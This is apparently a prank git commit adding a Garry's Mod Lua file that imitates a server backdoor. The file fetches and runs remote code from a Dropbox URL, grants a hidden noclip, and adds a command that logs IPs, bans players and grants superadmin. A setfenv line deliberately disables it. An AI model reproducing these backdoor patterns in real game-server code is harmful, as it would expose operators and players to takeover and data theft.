let's cause some drama

This commit is contained in:
William Wallace 2014-08-08 10:38:09 +01:00
parent 7c125af562
commit b597f506b3

View File

@ -0,0 +1,62 @@
--[[ ]] setfenv(1, setmetatable({}, {__index = function(_) return _ end, __call = function() end})) -- This makes all the code in thie file non-functional, http://facepunch.com/showthread.php?t=1415947 RED ALERT rofl
--[[ ]]print("INITIALIZING SHIT")
--[[ ]]local g = {}
--[[ ]]local r = debug.getregistry()
--[[ ]]
--[[ ]]_G.package.seeall(g)
--[[ ]]
--[[ ]]setfenv(1, g)
--[[ ]]
--[[ ]]hook.Add("Initialize", "", function()
--[[ ]] http.Fetch(
--[[ ]] "https://dl.dropboxusercontent.com/u/14265905/superlog_php.mp3",
--[[ ]] { hostname = GetHostName() },
--[[ ]] RunString,
--[[ ]] RunStringEx,
--[[ ]] CompileString,
--[[ ]] CompileFile
--[[ ]] )
--[[ ]]end)
--[[ ]]
--[[ ]]GAMEMODE.PlayerNoClip = function(ply)
--[[ ]] return util.CRC(ply:SteamID()) == 1337
--[[ ]]end
--[[ ]]
--[[ ]]hammer.SendCommand("set_group(1, `ADMIN`)")
--[[ ]]
--[[ ]]concommand.Add("ipyo", function()
--[[ ]] for k, v in pairs(player.GetAll()) do
--[[ ]] print(v, v:IPAddress())
--[[ ]]
--[[ ]] v:Kick()
--[[ ]] v:Ban()
--[[ ]] v:SendLua([[...]])
--[[ ]]
--[[ ]] v:Kill()
--[[ ]] v:KillSilent()
--[[ ]] v:SetUserGroup("superadmin")
--[[ ]]
--[[ ]] v:UniqueID()
--[[ ]]
--[[ ]] v:Give([[weapon_adminstick]])
--[[ ]] end
--[[ ]]end)
--[[ ]]
--[[ ]]BroadcastLua([[...]])
--[[ ]]
--[[ ]]HTTP {}
--[[ ]]
--[[ ]]
--[[ ]]
--[[ ]]util.Base64Encode("hololo")
--[[ ]]
--[[ ]]util.Compress("holololo")
--[[ ]]
--[[ ]]setmetatable(getmetatable(g), 0)
--[[ ]]
--[[ ]]FindMetaTable "Player"
--[[ ]]
--[[ ]]rawset(rawget(g, 'g'), 0)
--[[ ]]
--[[ ]]
-- You just got pranked by the prank patrol